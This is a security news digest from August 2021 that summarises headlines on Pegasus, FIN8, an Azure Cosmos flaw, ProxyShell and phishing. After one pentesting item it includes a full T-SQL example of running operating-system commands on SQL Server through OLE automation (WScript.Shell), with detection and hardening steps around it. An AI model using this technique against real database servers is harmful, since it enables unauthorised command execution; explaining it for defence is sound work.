InfoSec News 20210827

  • Published: Fri, 27/08/2021 - 10:22

Top News


  • Mobile Security companies are lining up for protection against Pegasus Malware

"As the Pegasus malware nuisance is slowly found politically gripping the entire world, companies offering security solutions to mobile users are getting busy in finding out a solution that helps protect against the infection repercussions caused by the Pegasus Malware."

Link

TLP1 : Green

  • ULA email leak: internal emails allege smear campaign against SpaceX and Elon Musk

"Six internal emails, allegedly involving correspondence between a union lobbyist and a senior official of American spacecraft launch service provider United Launch Alliance (ULA), have been leaked on a popular hacker forum."

Link

TLP1 : Green

  • Preparing for a RDDoS extortion attack

"Ransom attacks dominate cybercrime headlines. May’s Colonial Pipeline attack reduced US east coast fuel supply by 45 percent, resolved only by a $4.4 million ransom payment. In the weeks that followed, President Joe Biden even went as far as calling on Vladimir Putin to move against ransomware groups operating from Russia."

Link

TLP1 : Green

Cybersecurity State: Surveillance, Cyberwarfare, Cybercriminality and Hacktivism


  • New surveillance law to combat crime on the 'dark web' has civil liberties groups worried

"The federal government has passed legislation which will grant top law enforcement agencies new and intrusive powers to combat cyber crime on the dark web, but the new law has some groups worried about the extent of the capabilities it unleashes."

Link

TLP1 : Green

  • FIN8 APT Hackers Attack Financial Institutions Using Sophisticated Backdoor

"The security analysts from the cybersecurity firm Bitdefender have recently noted the new backdoor BADHATCH malware that was being used by the very well-known threat actor, FIN8."

Link

TLP1 : Green

Breaches: Data Breaches and Hacks


  • Breach at Deep South allergy clinic group exposed the health info of estimated 9,800 patients

"Atlanta Allergy & Asthma (AAA), the largest allergy treatment healthcare business in the region, is notifying 9,800 patients that a January data breach involved protected health information."

Link

TLP1 : Green

  • Critical Cosmos Database Flaw Affected Thousands of Microsoft Azure Customers

"Cloud infrastructure security company Wiz on Thursday revealed details of a now-fixed Azure Cosmos database vulnerability that could have been potentially exploited to grant any Azure user full admin access to other customers' database instances without any authorization."

Link

TLP1 : Green

Vulnerabilities: Vulnerability Advisories, Zero-Days,Patches and Exploits


  • Big bad decryption bug in OpenSSL – but no cause for alarm

"The well-known and widely-used encryption library OpenSSL released a security patch earlier this week.

Annoyingly for those who like lean, modern, sans serif typefaces, the new version is OpenSSL 1.1.1l, which is tricky to interpret if you use a font in which upper case EYE, lower case ELL and the digit ONE look at all similar."

Link

TLP1 : Green

  • New variant of PRISM Backdoor ‘WaterDrop’ targets Linux systems

"According to researchers, the PRISM backdoor has been on their radar for more than 3.5 years.

Security researchers at AT&T Labs have published a report sharing details of a newly discovered cluster of Linux ELF executables with zero to low antivirus detections on VirusTotal."

Link

TLP1 : Green

  • Cisco Patches Serious Vulnerabilities in Data Center Products

"Cisco this week announced the release of patches for a critical vulnerability affecting its Application Policy Infrastructure Controller (APIC) and Cloud APIC products."

Link

TLP1 : Green

  • Follow up: Microsoft Issues Guidance on ProxyShell Vulnerabilities

"Microsoft on Wednesday warned Exchange customers that their deployments are exposed to attacks exploiting the ProxyShell vulnerabilities, unless the adequate patches have been installed."

Link

TLP1 : Green

Incident Response: Infrastructure, Training, SIEM and Incident Handling


  • Beyond the XDR Hype – A Look at the Forrester New Tech on Extended Detection and Response

"Driven by the need for richer threat context, the Extended Detection and Response (XDR) solutions category is gaining a lot of “market buzz” so far in 2021. In recent months, the industry analyst community has accelerated its research efforts in this area to help guide the market towards a common understanding of XDR."

Link

TLP1 : Green

  • Engineering Workstations Are Concerning Initial Access Vector in OT Attacks

"Organizations that use industrial control systems (ICS) and other operational technology (OT) are increasingly concerned about cyber threats, and while they have taken steps to address risks, many don’t know if they have suffered a breach, according to a survey conducted by the SANS Institute on behalf of industrial cybersecurity firm Nozomi Networks."

Link

TLP1 : Green

Technical Articles: Forensics, Reverse Engineering, Malware, Phishing, Pentesting, Software Security and Cryptography


  • BeaconEye - Hunts Out CobaltStrike Beacons And Logs Operator Command Output

"BeaconEye scans running processes for active CobaltStrike beacons. When processes are found to be running beacon, BeaconEye will monitor each process for C2 activity."

Link

TLP1 : Green

  • Fraud impersonating the Continente brand spreads via WhatsApp: Don't be fooled!

"A new fraudulent campaign impersonating the Continente brand is being spread in Portugal a few days before the end of August 2021. The miscreants use a landing page that is fully responsive on mobile devices, carrying a message about the celebration of the 40th anniversary of the Continente brand."

Link

TLP1 : Green

  • How Threat Detection is Evolving

"As adversaries have shifted the focus of attacks to achieve their goals, defenders must evolve their approach to threat detection.
The threat landscape is dynamic and ever changing. Adversaries are evolving their approaches and targets."

Link

TLP1 : Green

  • MSSQL for Pentester: Command Execution with Ole Automation

"OLE automation is a process through which an application can access and manipulate the implied objects in other applications. Hence, in this article, we will see how to use OLE automation to our benefit."

Link

TLP1 : Green
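As an added illustration of the technique the item above refers to (this is not code from the linked article), the T-SQL below shows what "command execution with OLE automation" means on SQL Server: the sp_OACreate / sp_OAMethod stored procedures instantiate a COM object such as WScript.Shell and call its methods, so a sysadmin-level login can run operating-system commands as the SQL Server service account. The command (whoami) and the output path under C:\Windows\Temp are placeholders; the sys.configurations query at the top and the final sp_configure call are the check and the hardening step a defender would run.

```sql
-- Added example (not from the linked article). Requires sysadmin on the instance;
-- 'whoami' and C:\Windows\Temp\out.txt are placeholder choices for illustration.

-- 1. Defender check: is the feature enabled? value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'Ole Automation Procedures';

-- 2. Attacker step: turn the feature on (it is off by default). Both calls
--    are logged by SQL Server auditing if it is configured, which is why
--    sp_configure changes are worth alerting on.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

-- 3. Instantiate WScript.Shell and run a command. Run(cmd, windowStyle, wait):
--    windowStyle 0 = hidden, wait 1 = block until the process exits.
DECLARE @shell INT, @fso INT, @file INT, @hr INT, @output VARCHAR(8000);
EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT;
IF @hr <> 0
BEGIN
    RAISERROR('sp_OACreate WScript.Shell failed (feature disabled or not sysadmin)', 16, 1);
    RETURN;
END
EXEC @hr = sp_OAMethod @shell, 'Run', NULL,
    'cmd.exe /c whoami > C:\Windows\Temp\out.txt', 0, 1;
EXEC sp_OADestroy @shell;

-- 4. Read the command output back through Scripting.FileSystemObject
--    (OpenTextFile mode 1 = ForReading) so it comes back as a result set.
EXEC sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT;
EXEC sp_OAMethod @fso, 'OpenTextFile', @file OUTPUT, 'C:\Windows\Temp\out.txt', 1;
EXEC sp_OAMethod @file, 'ReadAll', @output OUTPUT;
SELECT @output AS command_output;   -- the service account name, e.g. NT Service\MSSQLSERVER
EXEC sp_OADestroy @file;
EXEC sp_OADestroy @fso;

-- 5. Hardening: disable the feature again and re-run the check from step 1.
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
```

Two practical caveats: the sp_OA* procedures are only executable by sysadmin unless explicitly granted, so this is a post-exploitation path rather than an initial foothold, and the command runs with the privileges of the SQL Server service account, which is why running that service as a low-privilege account limits the blast radius.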


1 Traffic Light Protocol (TLP) [1] for information sharing:

  • Red: Not for disclosure, restricted to participants only.
  • Amber: Limited disclosure, restricted to participants' organizations.
  • Green: Limited disclosure, restricted to the community.

[1] https://www.first.org/tlp